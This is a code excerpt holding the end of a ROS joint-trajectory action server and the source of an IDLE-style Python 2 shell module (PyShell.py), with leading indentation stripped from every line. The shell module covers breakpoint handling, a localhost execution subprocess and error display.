self._fdbk.error.positions = map(operator.sub,
self._fdbk.desired.positions,
self._fdbk.actual.positions
)
self._fdbk.error.time_from_start = rospy.Duration.from_sec(cur_time)
self._server.publish_feedback(self._fdbk)
def _command_stop(self):
self._ctl.SetPositionHold()
self._ctl.ClearPositionHold()
def _command_joints(self, joint_names, point, dimensions_dict):
if self._server.is_preempt_requested() or not self.robot_is_enabled():
rospy.loginfo("%s: Trajectory Preempted" % (self._action_name,))
self._server.set_preempted()
self._command_stop()
return False
deltas = self._get_current_errors(joint_names)
for delta in deltas:
if ((math.fabs(delta[1]) >= self._path_thresh[delta[0]]
and self._path_thresh[delta[0]] >= 0.0)) or not self.robot_is_enabled():
rospy.logerr("%s: Exceeded Error Threshold on %s: %s" %
(self._action_name, delta[0], str(delta[1]),))
self._result.error_code = self._result.PATH_TOLERANCE_VIOLATED
self._server.set_aborted(self._result)
self._command_stop()
return False
pos = dict(zip(joint_names, point.positions))
vel = dict(zip(joint_names, [0.0]*len(joint_names)))
acc = dict(zip(joint_names, [0.0]*len(joint_names)))
if dimensions_dict['velocities']:
vel = dict(zip(joint_names, point.velocities))
if dimensions_dict['accelerations']:
acc = dict(zip(joint_names, point.accelerations))
if self._alive:
self._ctl.CommandJoints(pos, vel, acc)
return True
def _check_goal_state(self, joint_names, last):
for error in self._get_current_errors(joint_names):
if (self._goal_error[error[0]] > 0
and self._goal_error[error[0]] < math.fabs(error[1])):
return error[0]
if (self._stopped_velocity > 0.0 and
max([abs(cur_vel) for cur_vel in self._get_current_velocities(joint_names)]) >
self._stopped_velocity):
return False
else:
return True
def _on_trajectory_action(self, goal):
joint_names = goal.trajectory.joint_names
self._get_trajectory_parameters(joint_names, goal)
success,results = self._traj_smoother.ProcessTrajectory(goal.trajectory,
self._get_current_position(joint_names),
False)
if not success:
self._server.set_aborted()
return
"""
Copy the results to variables that make sense namewise
"""
dimensions_dict = results[0]
b_matrix = results[1]
trajectory_points = results[2]
pnt_times = results[3]
num_points = results[4]
"""
Wait for the specified execution time, if not provided use now
"""
start_time = goal.trajectory.header.stamp.to_sec()
now = rospy.get_time()
if start_time == 0.0:
start_time = rospy.get_time()
while start_time > now:
now = rospy.get_time()
"""
Loop until end of trajectory time. Provide a single time step
of the control rate past the end to ensure we get to the end.
Keep track of current indices for spline segment generation
"""
self._ctl.Resume()
control_rate = rospy.Rate(self._trajectory_control_rate)
now_from_start = rospy.get_time() - start_time
end_time = trajectory_points[-1].time_from_start.to_sec()
while (now_from_start < end_time and not rospy.is_shutdown() and
self.robot_is_enabled()):
now = rospy.get_time()
now_from_start = now - start_time
idx = bisect.bisect(pnt_times, now_from_start)
"""
Calculate percentage of time passed in this interval
"""
if idx >= num_points:
cmd_time = now_from_start - pnt_times[-1]
t = 1.0
elif idx >= 0:
cmd_time = (now_from_start - pnt_times[idx-1])
t = cmd_time / (pnt_times[idx] - pnt_times[idx-1])
else:
cmd_time = 0.0
t = 0.0
point = self._traj_smoother.GetBezierPoint(b_matrix,
idx,
t,
cmd_time,
dimensions_dict)
"""
Command Joint Position, Velocity, Acceleration
"""
command_executed = self._command_joints(joint_names, point, dimensions_dict)
self._update_feedback(deepcopy(point), joint_names, now_from_start)
"""
Break the loop if the command cannot be executed
"""
if not command_executed:
return
control_rate.sleep()
"""
Keep trying to meet goal until goal_time constraint expired
"""
last = trajectory_points[-1]
last_time = trajectory_points[-1].time_from_start.to_sec()
end_angles = dict(zip(joint_names, last.positions))
while (now_from_start < (last_time + self._goal_time)
and not rospy.is_shutdown() and self.robot_is_enabled()):
if not self._command_joints(joint_names, last, dimensions_dict):
return
now_from_start = rospy.get_time() - start_time
self._update_feedback(deepcopy(last), joint_names,
now_from_start)
control_rate.sleep()
now_from_start = rospy.get_time() - start_time
self._update_feedback(deepcopy(last), joint_names,
now_from_start)
"""
Verify goal constraint
"""
result = self._check_goal_state(joint_names, last)
if result is True:
rospy.loginfo("%s: Joint Trajectory Action Succeeded for %s arm" %
(self._action_name, self._prefix))
self._result.error_code = self._result.SUCCESSFUL
self._server.set_succeeded(self._result)
elif result is False:
rospy.logerr("%s: Exceeded Max Goal Velocity Threshold for %s arm" %
(self._action_name, self._prefix))
self._result.error_code = self._result.GOAL_TOLERANCE_VIOLATED
self._server.set_aborted(self._result)
else:
rospy.logerr("%s: Exceeded Goal Threshold Error %s for %s arm" %
(self._action_name, result, self._prefix))
self._result.error_code = self._result.GOAL_TOLERANCE_VIOLATED
self._server.set_aborted(self._result)
self._command_stop()
self._ctl.Pause()
|
PyShell.py
|
#! /usr/bin/env python
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import subprocess
import macosxSupport
import linecache
from code import InteractiveInterpreter
try:
from Tkinter import *
except ImportError:
print>>sys.__stderr__, "** IDLE can't import Tkinter. " \
"Your Python may not be configured for Tk. **"
sys.exit(1)
import tkMessageBox
from EditorWindow import EditorWindow, fixwordbreaks
from FileList import FileList
from ColorDelegator import ColorDelegator
from UndoDelegator import UndoDelegator
from OutputWindow import OutputWindow
from configHandler import idleConf
from utils import tb_print_list
import idlever
import rpc
import Debugger
import RemoteDebugger
IDENTCHARS = string.ascii_letters + string.digits + "_"
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
global warning_stream
warning_stream = sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno,
file=None, line=None):
if file is None:
file = warning_stream
try:
file.write(warnings.formatwarning(message, category, filename,
lineno, file=file, line=line))
except IOError:
pass ## file (probably __stderr__) is invalid, warning dropped.
warnings.showwarning = idle_showwarning
def idle_formatwarning(message, category, filename, lineno, line=None):
"""Format warnings the IDLE way"""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
if line is None:
line = linecache.getline(filename, lineno)
line = line.strip()
if line:
s += " %s\n" % line
s += "%s: %s\n>>> " % (category.__name__, message)
return s
warnings.formatwarning = idle_formatwarning
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
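# Illustrative example (editor's addition): code typed at the shell prompt is
# cached under pseudo-filenames such as "<pyshell#12>", and those keys are the
# ones preserved across the checkcache() call:
#
#   >>> key = "<pyshell#12>"
#   >>> key[:1] + key[-1:]
#   '<>'
#
# so tracebacks for shell input keep their source lines available.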
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
if self.io.filename: self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text. Certain
# kinds of edits cause these ranges to be deleted: Inserting
# or deleting a line just before a breakpoint, and certain
# deletions prior to a breakpoint. These issues need to be
# investigated and understood. It's not clear if they are
# Tk issues or IDLE issues, or whether they can actually
# be fixed. Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
lines = open(self.breakpointPath,"r").readlines()
except IOError:
lines = []
new_file = open(self.breakpointPath,"w")
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
new_file.close()
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
"""Convert a tuple of ranges returned by Text.tag_ranges to
line numbers."""
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(str(ranges[index])))
end = int(float(str(ranges[index+1])))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
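# Illustrative sketch (not part of the original module): store_file_breaks()
# above persists one line per file to breakpoints.lst in the form
# "path=[lineno, lineno, ...]", and restore_file_breaks() reads it back with
# eval().  The same format can be parsed more defensively with ast.literal_eval:
import ast

def _demo_read_breakpoints(breakpoint_path, filename):
    try:
        lines = open(breakpoint_path, "r").readlines()
    except IOError:
        return []
    for line in lines:
        if line.startswith(filename + '='):
            return ast.literal_eval(line[len(filename) + 1:])
    return []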
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
rpcclt = None
rpcproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
args = self.subprocess_arglist
self.rpcproc = subprocess.Popen([sys.executable] + args[1:])
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
if 1/2 > 0: # account for new division
w.append('-Qnew')
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'vidle.PyShell':
command = "__import__('vidle.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
# handle embedded space in path by quoting the argument
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error, err:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.rpcclt.register("stdin", self.tkconsole)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path()
self.poll_subprocess()
return self.rpcclt
def get_restart_line(self):
halfbar = ((int(self.tkconsole.width) - 16) // 2) * '='
return halfbar + ' RESTART ' + halfbar
def restart_subprocess(self):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.transfer_path()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
console.write(self.get_restart_line())
console.text.tag_add("restart", "end - 1 line")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated and collect status."
if sys.platform[:3] == 'win':
try:
self.rpcproc.kill()
except WindowsError:
pass
else:
self.rpcproc.kill()
self.rpcproc.wait()
def transfer_path(self):
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (sys.path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print >>console, repr(what)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print >>sys.__stderr__, errmsg, what
print >>console, errmsg, what
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval,
self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main','Theme','name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print>>tkerr, '*** Error in script or command!\n'
print>>tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input\n")
return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self, temp_filename=None):
"""Extend base class method to reset output properly and print an
customized traceback."""
self.tkconsole.resetoutput()
self.checklinecache()
typ, value, tb = sys.exc_info()
sys.last_type = typ
sys.last_value = value
sys.last_traceback = tb
tblist = traceback.extract_tb(tb)
del tblist[:1]
sys.stderr.write('\nTraceback (most recent call last):\n')
if temp_filename is not None:
# Replace the name of the temporary file by 'Untitled'
main_fname = 'Untitled'
new_tb = []
for t in tblist:
fname = main_fname if t[0] == temp_filename else t[0]
new_tb.append((fname, ) + t[1:])
tblist = new_tb
else:
main_fname = tblist[0][0]
tb_print_list(tblist, main_fname, sys.stdout, sys.stderr)
lines = traceback.format_exception_only(typ, value)
map(sys.stderr.write, lines)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code, tempname=None):
"Override base class method"
if self.tkconsole.executing:
self.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code, tempname), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print >>self.tkconsole.stderr, \
"IDLE internal error in runcode()"
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print >>self.tkconsole.stderr, "KeyboardInterrupt"
else:
self.showtraceback(tempname)
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
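# Illustrative sketch (not part of the original module): transfer_path(),
# prepend_syspath() and main() all ship short scripts to the subprocess via
# runcommand().  The "if 1:" header keeps the indented body a single compound
# statement, and %r embeds Python values as valid literals:
def _demo_build_argv_command(argv):
    return """if 1:
        import sys as _sys
        _sys.argv = %r
        del _sys
        \n""" % (argv,)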
class PyShell(OutputWindow):
shell_title = "Python Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if macosxSupport.runningAsOSXApp():
del menu_specs[-3]
menu_specs[-2] = ("windows", "_Window")
# New classes
from IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
import IOBinding
self.stdout = PseudoFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoStderrFile(self, encoding=IOBinding.encoding)
self.console = PseudoFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
# Cleanup functions to be called when endexecuting is called
self._cleanup_funcs = []
def append_cleanup_func(self, func, *args, **kwargs):
self._cleanup_funcs.append((func, args, kwargs))
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
for func, args, kwargs in self._cleanup_funcs:
func(*args, **kwargs)
self._cleanup_funcs = []
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
if self.reading:
self.top.quit()
self.canceled = True
self.closing = True
# Wait for poll_subprocess() rescheduling to stop
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
